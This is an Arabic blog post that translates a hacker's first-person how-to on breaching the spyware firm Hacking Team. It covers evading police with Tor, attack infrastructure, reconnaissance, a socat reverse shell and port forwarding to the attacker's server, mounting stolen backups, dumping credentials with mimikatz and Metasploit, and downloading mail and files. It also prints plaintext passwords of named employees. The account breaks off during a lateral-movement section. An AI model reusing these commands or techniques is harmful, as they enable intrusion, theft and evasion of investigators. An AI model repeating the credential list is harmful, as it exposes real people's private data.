الخميس، 13 أكتوبر، 2016

وادي التقنية

وادي التقنية

Link to وادي التقنية - أخبار تقنية المعلومات أولا بأول

الهكر المضاد (العكسي ) دليلك لفعلها بنفسك

Posted: 13 Oct 2016 12:28 AM PDT

الهكر المضاد (العكسي ) دليلك لفعلها بنفسك

ستجد في هذه الفقرة تعريفات مفصلة للقرصنة والقرصنة المضادة إضافة لقصة اختراق أكبر شركات القرصنة الإلكترونية والتي يرويها المخترق نفسه.

مقدمة :


سوف تلاحظ اختلافا  جليا في اللغة منذ آخر إصدارة لهذا الدليل [ 1 ]  يمتلك العالم الناطق باللغة الإنجليزية الكثير من الكتب , والمحادثات , والأدلة , والمعلومات عن القرصنة حول العالم, هناك الكثير من الهكرز ( المبرمجين المحترفين أو المتسللين) أفضل مني , ولكنهم يسيئون استخدام مواهبهم في العمل مع المخابرات بدلا من حماية المؤسسات والوكالات و البنوك والشركات وكذا الدفاع عن أمن الدول.
ولدت ثقافه القرصنة  في الولايات المتحدة باعتبارها ثقافة دفاعية-أو هذا ما أريد لها في الأصل- قبل أن تنتشر في بقية أنحاء العالم.وقد استوعبت الكثير من المنضمين من ضمنهم الهكرز الحقيقيون والهواة يظن بعض هؤلاء أن كل من صبغ شعره وارتدى قميصا غريبا يصبح قرصانا ، بينما في الحقيقة أن القرصنة فن ولقب القرصان لا يستحقه إلا المحترف فقط
فبدلا من التسلل إلى المكاتب من أجل تسريب الوثائق [2] أو استخدام البندقية من أجل سرقة  البنوك . أصبح بإمكانك فعل كل ذلك وأنت على سريرك وبواسطة جهاز الكمبيوتر .
وقد أدلى المركز الوطني للاستشعار  CNT بعد الاختراق الذي استهدف مجموعة غاما بتصريح قال فيه
 "دعونا نقم باتخاذ خطوة إلى الأمام وابتكار أشكال جديدة من النضال "[5]. القرصنة أداة قوية دعونا نتعلمها ونكافحها !"

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2]https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

1- فريق القرصنة ( الهكرز ) : Hacking Team
فريق القرصنة هو شركة ساعدت عدة حكومات على اختراق المواقع والتجسس على الصحفيين ونشطاء المعارضة السياسية , وغيرهم مما يشكل تهديدا لقوتهم .
[1][2][3][4][5][6][7][8][9][10][11]
وفى بعض الأحيان مكنت الشرطة من القبض على المجرمين والإرهابيين الفعليين .
[ 12 ]  عكف  فينسينزيتي , الرئيس التنفيذى للشركة على تذييل رسائل البريد الإلكتروني بواسطة الشعار الفاشى  " boia chi molla" أو بعبارة أصح  "  boia chi vende RCS " كما تدعي الشركة أنها تملك تكنولوجيا تحل "المشاكل الأمنية " التي تسببها  Tor و الأنترنت المظلم [ 13 ] ولكن وبما أني ما زلت حرا حتى الآن فإني أشك في فاعليتها .

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12]http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

2- كن بأمان  :


للأسف , عالمنا متناقض فيمكنك فيه الوصول إلى مراحل الأغنياء من خلال الأفعال السيئة، والوصول إلى السجن من خلال عمل الخير , لحسن الحظ بواسطة الجهد الشاق الذي قام به فريق  مؤسسي مشروع تور .[ 1 ] أصبح بالإمكان تجنب الذهاب إلى السجن من خلال اتخاذ بعض الاحتياطات البسيطة :
1- تشفير القرص الثابت [ 2 ]   عندما تصل الشرطة إلى مرحلة مصادرة جهاز الكمبيوتر الخاص بك فهذا يعنى أنك قمت بفعل الكثير من الأخطاء, لذا من الأفضل حينها أن تكون معلوماتك بأمان.
2- استخدام جهاز تخيلي مع توجيه كل تحركات البيانات عن طريق شبكة Tor  
وهذا يحقق أمرين :
أولا : حجب ولوجك وجميع تحركاتك ومصادر بحثك عبر تور
ثانيا : الحفاظ على الحياة الشخصية الخاصة بك، وإبقائها بعيدة عن أجهزة كمبيوتر لتفادي تعريضها لخطر القرصنة عن طريق الخطأ  .
يمكنك استخدام برامج مثل Whonix [3] أو Tails [4] أو Qubes TorVM
[ 5 ]  أو شيء مخصصا [ 6 ]
 من هنا تجد [ 7 ]  مقارنة تفصيلية.
3- ( اختياري ) عدم الاتصال المباشر عبر Tor :
تور ليست دواء لكل داء. فمن الممكن أن يربطوا وقت  اتصالك بشبكة تور مع فترة نشاط  القراصنة الذي تقوم به،   بالإضافة إلى أنها سجلت هجمات ناجحة ضد تور [ 8 ]
يمكنك الاتصال بـ تور عن طريق استخدام شبكات wifi  أخرى. توزيعة Wifislax [ 9 ] تابعة لنظام لينكس وتضم الكثير من الأدوات لتكسير الواي فاي. وثمة خيار آخر هو الاتصال بشبكة VPN أو bridges nod [10] قبل الاتصال  بتور، ولكن هذا أقل أماناً نظراً لأنه لا يزال من الممكن ربط فترة اتصالك بالإنترنت في البيت مع فترة نشاطك في الهكر . (وهذا هو السلاح الذي استخدم ضد جيرمي هاموند [11]).
في الواقع لا يمكن أن نقول أن تور ليست مثالية تماما ، فهي تعمل بشكل جيد جداً. فقد ساعدتني عندما كنت يافعا ومتهورا، فقد فعلت الكثير من الأشياء دون أي حماية (أقصد القرصنة) بغض النظر عن تور، فقد تفاديت السجن عدة مرات  و لم أصب بأي أذى .

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

 

3.1-  البنية التحتية :


أنا لا أقوم بالقرصنة بواسطة عقد تور بصفة مباشرة، فهي في القوائم السوداء وبطيئة ولا يمكن أن تستقبل الاتصالات العكسية. يحمي تور خصوصيتي أثناء الاتصال بالبنية التي أستخدمها في القرصنة، والتي تتكون من :
1 ) أسماء النطاق :
عناوين C & C، وممرات DNS  لضمان الخروج
2) خوادم مستقرة :
لاستخدامها في خوادم C & C، ولتفادي الهجمات الخارجية،و شن الهجمات، وتخزين المسروقات.
3) خوادم الاختراق :
تستخدم كمحاور لإخفاء عناوين IP الخوادم المستقرة .  وفي حال أردت الاتصال سريعا وبصورة مباشرة، على سبيل المثال لفحص المنافذ وتصفح الإنترنت  وتحميل قاعدة بيانات مع sqli، إلخ.
  ومن البديهي أن يكون لديك طريقة دفع مجهولة الهوية للتمويه ولاتبقيك مخفيا، مثل بيتكوين (إذا تم استخدامه بعناية).

3. 2 – النسبة :


في الأخبار كثيرا ما نرى هجمات تعود إلى مجموعات القراصنة المدعومة من الحكومة ("APTs")، لأنها تقوم باستخدام نفس الأدوات مرارا وتكرارا، وتترك نفس الآثار، حتى إنها تستخدم نفس البنية الأساسية (النطاقات، ورسائل البريد الإلكتروني، إلخ). إنهم مهملون في ذلك بسبب أنهم يمكنوا أن يخترقوا من دون أي عواقب قانونية.
أنا لا أرغب بأن أجعل عمل الشرطة سهلا بربط قرصنتي على فريق القراصنة بأنشطتي الأخرى في القرصنة أو بالأسماء التي أستخدمها يوميا في عملي كقرصان قبعة السوداء .   لذلك، استخدمت خوادم جديدة وأسماء نطاقات جديدة مسجلة بأسماء بريد الإلكتروني جديدة ، وعناوين بيتكوين جديدة. أيضا، أنا أستخدم في العادة  أدوات متاحة علنا، أو برامج كتبتها خصيصا لهذا الهجوم، وقد غيرت طريقتي للقيام ببعض الأشياء حتى لا تترك بصمة تستخدم في الأدلة الجنائية المعتادة .


4- جمع المعلومات :


على الرغم من أنه يمكن لهذه المرحلة أن تكون مملة إلا أنها مهمة جدا، لأنه كلما كان مستوى الهجوم أكبر، فإنه من الأسهل اكتشاف ثغرة في مكان ما.

4 . 1 – المعلومات التقنية :
بعض الأدوات والتقنيات  :
1) جوجل :
يمكن الاطلاع على الكثير من الأمور المثيرة للاهتمام بواسطة استعلامات البحث يتم اختيارها بدقة. على سبيل المثال،  هوية PDR [1]. أو عن الكتاب المقدس للاستخدام جوجل للقرصنة" "Google Hacking for Penetration Testers" وهو كتاب يتحدث عن القرصنة" . يمكنك العثور على ملخص قصير للكتاب باللغة بالإسبانية [2].
2) المجال الفرعي المتعدد :
في كثير من الأحيان، تتم استضافة الموقع الرئيسي للشركة بواسطة طرف ثالث، وستجد نطاق IP الفعلي للشركة بواسطة المجالات الفرعية مثل mx.company.com أو ns1.company.com. أيضا، في بعض الأحيان  الأشياء التي لا ينبغي أن تعرض تكون في نطاقات "مخفية".
 أدوات مفيدة لاكتشاف المجالات والمجالات الفرعية :
fierce [3] و theHarvester [4]و recon-ng [5]

3) عمليات البحث وعمليات البحث المعاكسة  :
مع عمليات البحث العكسي باستخدام معلومات whois من مجال أونطاق IP يمكنك العثور على المجالات الأخرى ونطاقات ال IP على حد علمي.
لا توجد طريقة مجانية في عمليات البحث العكسية غير طريقة قرصنة جوجل.

"via della moscova 13" site:www.findip-address.com
"via della moscova 13" site:domaintools.com

4) مسح المنافذ و البصمات :
خلافا للتقنيات الأخرى، فهذ الطريقة تتخاطب مع خوادم الشركات . و قمت بإدرا جها في هذا المقطع لأنه لا يتحدث عن القرصنة بقدر ما هو مقطع لجمع المعلومات فقط.
خوادم الشركات  IDS تقوم بإطلاق تنبيهات، ولكن لا داعي  للقلق حيث يتم فحص كامل لشبكة الإنترنت باستمرار.
 للمسح فإن nmap [6] تعتبر دقيقة، ويمكن أخذ بصمات غالبية الخدمات التي تم اكتشافها.
وبالنسبة للشركات ذات مدى IP الكبير
zmap [7]  او masscan [8]
اللذان يتميزان بالسرعة . أما
WhatWeb [9] أو BlindElephant [10]
   .فإنهما موجهان لأخذ بصمات مواقع الإنترنت.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/

4 . 2 - المعلومات الاجتماعية :
بالنسبة للهندسة الاجتماعية، فهي مفيدة للحصول على معلومات عن الموظفين، وأدوارهم، ومعلومات جهة الاتصال، ونظام التشغيل، ومتصفح الانترنت، والإضافات، والبرمجيات، إلخ.
بعض الموارد:
1) جوجل :
هو أداه مفيدة للغايه .
2) theHarvester و recon-ng

سبق أن أشرت إلي الكثير منهم في القسم السابق، ولهم  الكثير من الوظائف. ويمكن العثور على الكثير من المعلومات بسرعة وتلقائيابواسطتها " إنها تستحق قراءه كل وثائقها ".
3) LinkedIn:
يحوي الكثير من المعلومات حول الموظفين.وغالبا فإن طاقم التوظيف سيقبل دعوتك للتواصل.
4) Data.com:
كانت تعرف سابقا باسم jigsaw . وتحوي الكثير من معلومات الاتصال الخاصة بالموظفين.
5) File metadata:
يمكن الاطلاع على كثير من المعلومات حول الموظفين ونظمها على شكل بيانات وصفية في ملفات تنشرها الشركة.
نعرض لكم أدوات مفيدة للعثور على الملفات في موقع ويب تابع لشركة ما ولاستخراج بيانات التعريف هي metagoofil [1] Fog [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

5- دخول الشبكات :


هناك طرق مختلفة للحصول على موطئ قدم. نظراً لأن الأسلوب المستخدم ضد "فريق القرصنة" غير شائع ويتضمن الكثير من العمل غير الضروري في العادة، سوف أتحدث قليلاً عن الطريقتين الأكثر شيوعاً، واللتين أوصى باستخدامهما أول.
5 . 1 – الهندسة الاجتماعية :
الهندسة الاجتماعية، على وجه التحديد هي تمثل رمح صيد ، فهي المسؤولة عن أغلب عمليات الاختراق في هذه الأيام. "للحصول على مقدمة في الإسبانية"، راجع [1]. لمزيد من المعلومات باللغة الإنجليزية، راجع [2] (الجزء الثالث، " الهجمات المستهدفه ").
قصص ممتعه  عن  الهندسة الاجتماعية للأجيال السابقة، انظر [3].
لم أرغب بتجربة محاولة طريقة "الرمح المخادع" ضد فريق القرصنة، لأن كل أعمالهم تتمثل في مساعدة الحكومات على صيد خصومها، لذا فمن الممكن أنهم سينتبهوا لمحاولة اختراقهم وسيتحققوا من هذه المحاولة.

[1]http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

5 . 2 – شراء الولوج ( buying access ) :
بفضل الروس الذين يعملون بجد وبفضل أدوات الاختراق، وبائعي حركة المرور، ورعاة البرامج الآلية، العديد من الشركات تكون أجهزة الحاسوب والشبكات الخاصة بها معرضة للخطر. تقريبا كل الشركات الأغنى الخمسمئة،  تحوي مسبقا في شبكاتها الداخلية الضخمة برامج آلية bots ، وبسبب أن  "فريق القرصنة" شركة صغيرة جداً، ومعظم موظفيها خبراء أمنيين، فقد كانت هناك فرصة ضئيله بأنهم مخترقين بالفعل.
5 . 3 – استغلال التقنية ( Technical Exploitation ) :
بعد عملية اختراق مجموعة غاما , قمت بوصف عملية البحث من أجل الكشف عن نقاط ضعف [1]. كانت شركة فريق القراصنة تملك نطاق عام واحد:
 

 inetnum:        93.62.139.32 - 93.62.139.47 descr:          HT public subnet

 كانت نسبة انكشاف " فريق القراصنة"  على الإنترنت قليلة جدا. فعلى سبيل المثال، و بخلاف مجموعة غاما،  كان موقع دعم العملاء بحاجة لشهادة عميل من أجل الاتصال. فكل ما كان لديهم موقع رسمي للمجموعة ( عبارة عن مدونة جملة ولم يجد  Joomscan [2] أي شيء يشكل خطرا) ، وخادم البريد، وعدة موجهات و جهازا  VPN و جهاز تصفية البريد المزعج.
لذا كان لدي ثلاثة خيارات فقط : البحث عن ثغرة 0day في joomla،  أو البحث عن ثغرة 0day في postfix، أو البحث عن ثغرة 0day في أحد الأجهزة المضمنة ( المدمجة ) وهو الخيار الذي يبدو هو الأسهل ، وبعد أسبوعين من العمل على الهندسية العكسية توصلت لثغرة تتيح الوصول للجذر. وبما أن هذه الثغرات لم يصدر لها إصلاح لحد الآن فلن أقوم  بإعطاء مزيد من التفاصيل، ولكن للحصول على المزيد من المعلومات حول العثور على هذه الأنواع من نقاط الضعف،  راجع [3] و [4].
ملاحظة : 0day هو استغلال ثغرات أمنية ونقاط ضعف برمجيات خاصة غير المعروفة منها للعامة وحتى للمطورين أحيانا من أجل شن الهجمات الإلكترونية

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

6-كن مستعدا ( Be Prepared ) :


لقد قمت بالكثير من التدريبات  والاختبارات قبل  الهجوم على "فريق القرصنة".
 قمت بكتابة تعريف firmware يحوي على باب خلفي ، وقمت ببناء عدة أدوات ما بعد الاختراق للجهاز المضمن والتي ستعمل بعد عملية الاختراق. إن الباب الخلفي يقوم بحماية الثغرة حيث تستخدم للهجوم مرة  واحدة فقط ومن ثم العودة عبر الباب الخلفي مما يجعل من الصعب تحديد نقاط الضعف وتصحيحها .
إن الأدوات ما بعد الاختراق التي أعددتها هي :
1) Busybox : وهو عبارة عن تجميعة لكل أدوات يونكس المعيارية التي لا يملكها النظام.
Nmap : لمسح بصمات الشبكة الداخلية لـ"فريق القرصنة".
1) Responder.py : أفضل أداة للهجوم على شبكات الويندوز حالما يمكنك الوصول إلى شبكه الإنترنت الداخلية من دون مستخدم النطاق.
2) بايثون ( Python ) :
لتشغيل  Responder.py .
3) Tcpdump :لمراقبة حركه المرور .
4) Dsniff :
لمعرفه كلمات السر من البروتوكلات غير المشفرة مثل بروتوكول نقل الملفات ftp , ومن أجل خداع ARP
 لقد أردت استخدام Ettercap التي كتبت بواسطه فريق القراصنة نفسه بواسطة ALor و Naga  ولكن كان من الصعب بناءها لذلك النظام .
5) Socat :
من أجل موجة صدفة shell مريح مع Pty  .
من مخدمي: socat file: `tty`, raw, echo=0 tcp-listen:my_port
   من الجهاز المخترق:

  socat exec: 'bash -li', pty, stderr, setsid, sigint, sane \           tcp:my_server:my_port

و تعتبر مفيدة  أكثر من ذلك بكثير حيث تعتبر مثل السكين السويسرية العسكرية للشبكات ,راجع قسم الأمثلة في وثائقها .
6)  screen  :
 مثل الصدفة مع pty وهي ليست ضرورية ولكني فقط أشعر وأني بيتي وأنا في شبكة "فريق القرصنة " .
7) a SOCKS proxy server:
لاستخدام proxychains  حتى أتمكن من  الوصول إلى الشبكة المحلية الخاصة بهم من خلال أي برنامج .
8) tgcd:
لإعادة توجيه المنافذ , مثل خادم  SOCKS , من خلال جدار الناري

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/

أسوأ شيء يمكن أن يحدث هو أن يجعل بابي الخلفي و أدوات ما بعد الاختراق النظام غير مستقر  مما يجعل أحد الموظفين يتحقق من المشكلة ويكتشف الأمر. لذلك قضيت أسبوعا في اختبار الثغرة، وأدوات ما بعد الاختراق الخاصة بي على شبكات بعض شركات مخترقة أخرى قبل دخول شبكة " فريق القرصنة".


7-شاهد و استمع ( Watch and Listen ) :


الآن داخل شبكتهم الداخلية , أردت إلقاء نظرة عليها والتفكير في خطوتي التالية، فبدأت بتشغيل  Responder.py  في وضع التحليل ( A-  للإستماع دون إرسال ردود مسمومة ) وقمت بإجراء الفحص البطيء بواسطه nmap .
8-NoSQL Databases  :
إن NoSQL أو بالأحرى NoAuthentication  كانت هدية ضخمة لمجتمع الهاكر [1]. فعندما كنت قلقا من أنهم قاموا أخيرا بإصلاح كل المشاكل في تجاوز الصلاحيات في قاعدة البيانات  MySQL  [2] [3] [4] [5]، صممت قواعد البيانات الجديدة في نمط يفتقر إلى المصادقة من أساسه. وجدت Nmap   بعضا من هذه القواعد على شبكة الاتصال الداخلية  "لفريق القراصنة ":

 27017/tcp open  mongodb       MongoDB 2.6.5 | mongodb-databases: |   ok = 1 |   totalSizeMb = 47547 |   totalSize = 49856643072 ... |_    version = 2.6.5  27017/tcp open  mongodb       MongoDB 2.6.5 | mongodb-databases: |   ok = 1 |   totalSizeMb = 31987 |   totalSize = 33540800512 |   databases ... |_    version = 2.6.5

كانت نسخ من قواعد البيانات لبرنامج RCS حيث يقوم برنامج RCS بتسجيل الصوتيات من الهواتف و حفظها في MongoDB بنظام ملفات GridFS
مجلد الصوتيات في مواقع التورنت [6] جاء من هنا. اكتشفت أنهم  كانوا يتجسسون على أنفسهم دون قصد .

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/

9/ تقاطع الأسلاك :


على الرغم من أن سماع التسجيلات ومشاهدة صور الكاميرا  لفريق تطوير البرمجيات الخبيثة التابع  ل " فريق القرصنة"  ممتع إلا أنه لا يعد أمرا مهما.
لقد كان عدم أمان عملية النسخ الاحتياطي للشركة نقطة الضعف التي فتحت أبوابهم. ووفقا لوثائقهم[1] فإن أجهزة iSCSI من المفترض أن تكون في شبكة منفصلة، ولكن nmap وجدت بعضا منها في أحد شبكاتهم الفرعية 192.168.1.200/24:

التقرير الخاص بمسح "nmap"  ل
 

 ht-stynology.hackinhgteam.local  (192.168.200.66) 3260/tcp open  iscsi? | iscsi-info: |   Target: iqn.2000-01.com.synology:ht-synology.name |     Address: 192.168.200.66:3260,0 |_    Authentication: No authentication required

وتقرير Nmap لمسح synology-backup.hackingteam.local (192.168.200.72)

 ... 3260/tcp open  iscsi? | iscsi-info: |   Target: iqn.2000-01.com.synology:synology-backup.name |     Address: 10.0.1.72:3260,0 |     Address: 192.168.200.72:3260,0 |_    Authentication: No authentication required


يحتاج  iSCSI لوحدة نواة وقد كان من الصعب بناءها للنظام المضمن.
 قمت بتمرير المنفذ حتى أتمكن من ربطه عبر  VPS  :

 VPS: tgcd -L -p 3260 -q 42838 Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838  VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

الآن وجد iSCSI  الاسم iqn. 2000-01.com.synology ولكنه لم يتسطع ربطه بسبب أنه يظن أن ال IP الخاص به 192.168.200.72 بدلا من   127.0.0.
طريقة حلي هي كالتالي :

 iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

ثم

 iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

فظهر الملف! ثم قمت بربطه:

 vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

وجدت العديد من النسخ الاحتياطية لأجهزة التخيلية. و لكن خادم Exchange هو الأكثر إثارة للاهتمام. فقد كان ضخما جدا ليتم تنزيله. ولكنه كان من الممكن ربطه عن بعد والبحث عن الملفات المثيرة للاهتمام فيه:

  $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk $ fdisk -l /dev/loop0 /dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT لقد كانت الإزاحة هي 2048 * 512 = 1048576 $ losetup -o 1048576 /dev/loop1 /dev/loop0 $ mount -o ro /dev/loop1 /mnt/exchange/


و الآن في

 mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311


وجدت القرص الصلب الذي يحوي على النظام التخيلي وقمت بربطه:

  vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1


وأخيرا تم تفكيك الدمية الروسية وأصبح بالإمكان رؤية جميع الملفات من الخادم القديم  في
/mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

10.من النسخ الاحتياطي إلى مدير الشبكة


ما أثار اهتمامي في النسخ الاحتياطي هو معرفة ما إذا كان يمتلك كلمة المرور أو هاش يستخدم للوصول مباشرة للخادم الحقيقي الذي يعمل .
لقد بتشغيلpwdump و cachedump و lsadump [1] على سجلات الولوج
وقد وجدت كلمة مرور لحساب الخدمة besadmin بواسطة lsatdump  :

 _SC_BlackBerry MDS Connection Service 0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................ 0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8. 0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

قمت باستخدام proxychaines[2] و socks server على الجهاز المضمن و smbclient[3] لفحص كلمة المرور :

 proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'


لقد عملت! لقد كانت كلمة مرورbesadmin لا تزال سارية المفعول وأيضا للمدير المحلي. وقمت باستخدام وكيل و psexec_psh [4] التابع لـ metasploit لفتح جلسة meterpreter .
ومن ثم انتقلت إلى عملية 64 بايت.  وقمت بتشغيل
load kiwi" [5] و "creds_wdigest
فحصلت على حفنة من كلمات المرور بما في ذلك مدير الشبكة :
 

 HACKINGTEAM  BESAdmin       bes32678!!! HACKINGTEAM  Administrator  uu8dd8ndd12! HACKINGTEAM  c.pozzi        P4ssword      <---- lol great sysadmin HACKINGTEAM  m.romeo        ioLK/(90 HACKINGTEAM  l.guerra       4luc@=.= HACKINGTEAM  d.martinez     W4tudul3sp HACKINGTEAM  g.russo        GCBr0s0705! HACKINGTEAM  a.scarafile    Cd4432996111 HACKINGTEAM  r.viscardi     Ht2015! HACKINGTEAM  a.mino         A!e$$andra HACKINGTEAM  m.bettini      Ettore&Bella0314 HACKINGTEAM  m.luppi        Blackou7 HACKINGTEAM  s.gallucci     1S9i8m4o! HACKINGTEAM  d.milan        set!dob66 HACKINGTEAM  w.furlan       Blu3.B3rry! HACKINGTEAM  d.romualdi     Rd13136f@# HACKINGTEAM  l.invernizzi   L0r3nz0123! HACKINGTEAM  e.ciceri       2O2571&2E HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz

11......تحميل البريد.....


بواسطة كلمة المرور للشبكة أصبح بإمكاني الوصول للبريد قلب الشركة. وفي كل خطوة كنت أعمل حسابي بأنه من الممكن اكتشافي، فبدأت بتنزيل بريدهم الالكتروني قبل الاستمرار في الاكتشاف. قام Powershell [1] بجعل الأمر سهلا. ومن الطرافة أني وجدت علة في بورشل وطريقة تعامله مع الوقت.
بعد تحميل البريد الإلكتروني استغرقت بضع أسابيع للوصول إلى  الشفرة المصدرية وبقية الأمور  الأخرى . لذا كنت بين الفينة والأخرى أعود لتحميل رسائل البريد الجديدة. وقد كان  الخادم يعمل بالتقويم الإيطالي  يوم/شهر/سنة.
وقد استخدمت
 

 ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

ومع خيار New-MailboxExportRequest لتصدير البريد الإلكتروني الجديد( في هذه الحالة كان منذ 5 يونيو ) طرحت مشكلة التقويم وأصبحت ملزما بتحميل البريد قبل 12 في الشهر فإن التاريخ يحسب على أنه غير صالح لأن التقويم في الولايات المتحدة الأمريكية يأتي فيه الشهر أولا ولذا لا يمكن أن يزيد الشهر عن رقم 12  .
يبدو أن مهندسي مايكروسوفت اختبروا برمجياتهم مع خيارات الإقليمية الخاصة بالولايات المتحدة فقط.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

12....تحميل..الملفات. ..


بعد أن حصلت على صفة المشرف وصلاحياته بدأت بتحميل الملفات بواسطة الوكيل وخيار -Tc في smbclient
على سبيل المثال:

 proxychains smbclient '//192.168.1.230/FAE DiskStation' \     -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'  

قمت بتحميل المجلدات: Amministrazione و FAE DiskStation و FileServer الموجودة في التورنت بهذه الطريقة.

13.....مقدمة في مجال قرصنة شبكات ويندوز.......


قبل متابعة  قصة  "weones cauliaos"  "فريق القرصنة" ، أرغب في إعطاء معلومات عامة عن قرصنة شبكات الويندوز.
..13.1......الحركات الجانبية. .:
سأعطيكم لمحة موجزة عن التقنيات المختلفة للانتشار في شبكة ويندوز . تقنيات التحكم عن بعد تحتاج لمعرفة كلمة المرور أو هاش للدخول بصفة المشرف في الشبكة الهدف.
و إلى حد الآن يعتبر استخدام mimikatz [1] الأكثر شيوعا من أجل  الحصول على صلاحيات الإدارة .
خصوصا securlsa::logonopasswords  و sekurlsa:msv على أجهزة الحاسوب التي لديكم عليها صلاحيات المشرف.
جميع التقنيات الحركة ( بالداخل) تحتاج إلى امتيازات إدارية للقيام بها  (ما عدا في RUNAS) .
ومن أهم آليات تجاوز الصلاحيات : PowerUp [2], و bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

التحرك عن بعد :
1) psexec
طريقة حقيقية و مجربة للقيام بحركة جانبية على ويندوز، يمكن استخدام psexec [1], winexe [2], metasploit's psexec_psh [3],

  PowershellEmpire's invoke_psexec [4], أو أمر ويندوز المضمن  "sc" [5].
